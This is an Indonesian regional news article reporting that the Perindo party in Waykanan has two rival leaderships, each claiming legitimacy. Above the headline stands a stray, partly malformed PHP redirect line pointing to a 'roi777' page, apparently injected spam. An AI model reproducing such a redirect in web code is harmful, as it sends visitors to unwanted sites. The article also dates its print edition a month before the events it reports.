header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Partai Perindo Waykanan Miliki Kepengurusan Ganda -
Partai Perindo Waykanan Miliki Kepengurusan Ganda

TRANSLAMPUNG.COM, BLAMBANGAN UMPU –

Terkait partai perindo di Kabupaten Waykanan yang memiliki dua kepengurusan menjadi polemik tersendiri bagi partai besutan Bos MNC Group Hary Tanoesudibyo itu, bagaimana tidak ketika KPUD Kabupaten Waykanan melakukan sosialisasi PKPU no 11 tahun 2017 kemarin senin (2/10) diaula setempat terdapat 2 kepengurusan partai perindo yang hadir di acara tersebut, yaitu kepengurusan kepemimpinan Dul Rahman dan kepemimpinan Hamka.

Saat di temui oleh media Translampung dikediaman nya selasa (3/10) Dul Rahman mengakui bahwa dia masih sah menjadi ketua DPD partai perindo Kabupaten Waykanan, karena hingga saat ini dia merasa belum ada surat pemberhentian atau pun pencabutan SK oleh DPW maupun DPP partai perindo terhadap dirinya.

“sampai sekarang belum ada surat pemberhentian ataupun surat pencabutan SK dari pusat yang saya terima, kalaupun saya harus diberhentikan mestinya DPW ataupun DPP harus memberikan teguran dan sangsi tegas kepada saya baru mengirimkan surat pencabutan, sesuai dengan prosedur AD/ART partai Perindo,” ujar Dul Rahman.

Di tempat berbeda saat dikonfirmasi Hamka juga mengakui bahwa dirinya adalah ketua sah partai Perindo Kabupaten Waykanan bahkan dia beserta kepengurusannya sudah memiliki SK sah dari DPP partai perindo nomor 1295/SK/DPP_partai perindo/lV/2017 dan sudah ditandatangani oleh ketua umum dan Sekjen partai Perindo ditetapkan di Jakarta pada tanggal 28 april 2017. (Migo)

Untuk lebih lengkapnya silahkan baca Harian Trans Lampung, edisi Cetak Rabu 4 September 2017.

 

News Reporter